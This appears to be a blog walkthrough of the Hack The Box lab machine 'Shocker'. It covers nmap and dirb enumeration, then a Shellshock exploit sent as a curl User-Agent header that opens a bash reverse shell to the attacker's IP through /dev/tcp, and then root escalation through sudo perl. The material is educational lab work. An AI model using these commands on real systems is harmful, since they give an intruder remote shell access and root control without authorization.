HTB: Shocker

Details

This machine is Shocker from Hack The Box

Recon

I started with a service discovery scan

root@kali:~# nmap -sV -p- -T4 10.10.10.56
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-08 14:22 EDT
Nmap scan report for 10.10.10.56
Host is up (0.064s latency).
Not shown: 65533 closed ports
PORT     STATE SERVICE VERSION
80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
2222/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 27.31 seconds

User

First the webserver at http://10.10.10.56/

Screenshot 1

Then dirbuster

Screenshot 2

Screenshot 3

So I setup another on the cgi-bin, this time using dirb to make it easier to use a wordlist for extensions

root@kali:~# dirb http://10.10.10.56/cgi-bin -x /usr/share/dirb/wordlists/extensions_common.txt
[SNIP]
---- Scanning URL: http://10.10.10.56/cgi-bin/ ----
+ http://10.10.10.56/cgi-bin/user.sh (CODE:200|SIZE:118)
[SNIP]

So I went to the url and was offered up a script for download

root@kali:~# cat user.sh
Content-Type: text/plain

Just an uptime test script

 16:26:18 up  2:36,  0 users,  load average: 0.00, 0.00, 0.00

So a shell script, in cgi-bin, on a machine called shocker. I took a guess it would be shellshock and set a listener

root@kali:~# nc -nlvp 4444

My normal reverse shell with shell shock didn't work, but an alternative did

root@kali:~# curl -H 'User-Agent: () { :;}; /bin/bash -i >&/dev/tcp/10.10.14.35/4444 0>&1' http://10.10.10.56/cgi-bin/user.sh

connect to [10.10.14.35] from (UNKNOWN) [10.10.10.56] 33150
bash: no job control in this shell
shelly@Shocker:/usr/lib/cgi-bin$ 

And there's my shell, now for a flag

shelly@Shocker:/usr/lib/cgi-bin$ cd ~
shelly@Shocker:/home/shelly$ ls -la
drwxr-xr-x 4 shelly shelly 4096 Sep 22  2017 .
drwxr-xr-x 3 root   root   4096 Sep 22  2017 ..
-rw------- 1 root   root      0 Sep 25  2017 .bash_history
-rw-r--r-- 1 shelly shelly  220 Sep 22  2017 .bash_logout
-rw-r--r-- 1 shelly shelly 3771 Sep 22  2017 .bashrc
drwx------ 2 shelly shelly 4096 Sep 22  2017 .cache
drwxrwxr-x 2 shelly shelly 4096 Sep 22  2017 .nano
-rw-r--r-- 1 shelly shelly  655 Sep 22  2017 .profile
-rw-r--r-- 1 root   root     66 Sep 22  2017 .selected_editor
-rw-r--r-- 1 shelly shelly    0 Sep 22  2017 .sudo_as_admin_successful
-r--r--r-- 1 root   root     33 Sep 22  2017 user.txt

shelly@Shocker:/home/shelly$ cat user.txt
[REDACTED]

Root

I then began to look for root

shelly@Shocker:/home/shelly$ sudo -l
Matching Defaults entries for shelly on Shocker:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User shelly may run the following commands on Shocker:
    (root) NOPASSWD: /usr/bin/perl

Awesome

shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/sh";'
sudo: no tty present and no askpass program specified

Can fix that hopefully

shelly@Shocker:/home/shelly$ python -c "import pty;pty.spawn('/bin/bash')"
bash: /usr/bin/python: No such file or directory

Maybe python3

shelly@Shocker:/home/shelly$ python3  -c "import pty;pty.spawn('/bin/bash')"
shelly@Shocker:/home/shelly$ 

Back to perl

shelly@Shocker:/home/shelly$ sudo perl -e 'exec "/bin/sh";'
# 

There we go

# id
uid=0(root) gid=0(root) groups=0(root)

# cd /root

# ls -la
drwx------  4 root root 4096 Sep 22  2017 .
drwxr-xr-x 23 root root 4096 Sep 22  2017 ..
-rw-------  1 root root    0 Sep 25  2017 .bash_history
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
drwx------  2 root root 4096 Sep 22  2017 .cache
drwxr-xr-x  2 root root 4096 Sep 22  2017 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-r--------  1 root root   33 Sep 22  2017 root.txt
-rw-r--r--  1 root root  170 Sep 22  2017 .wget-hsts

# cat root.txt
[REDACTED]

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.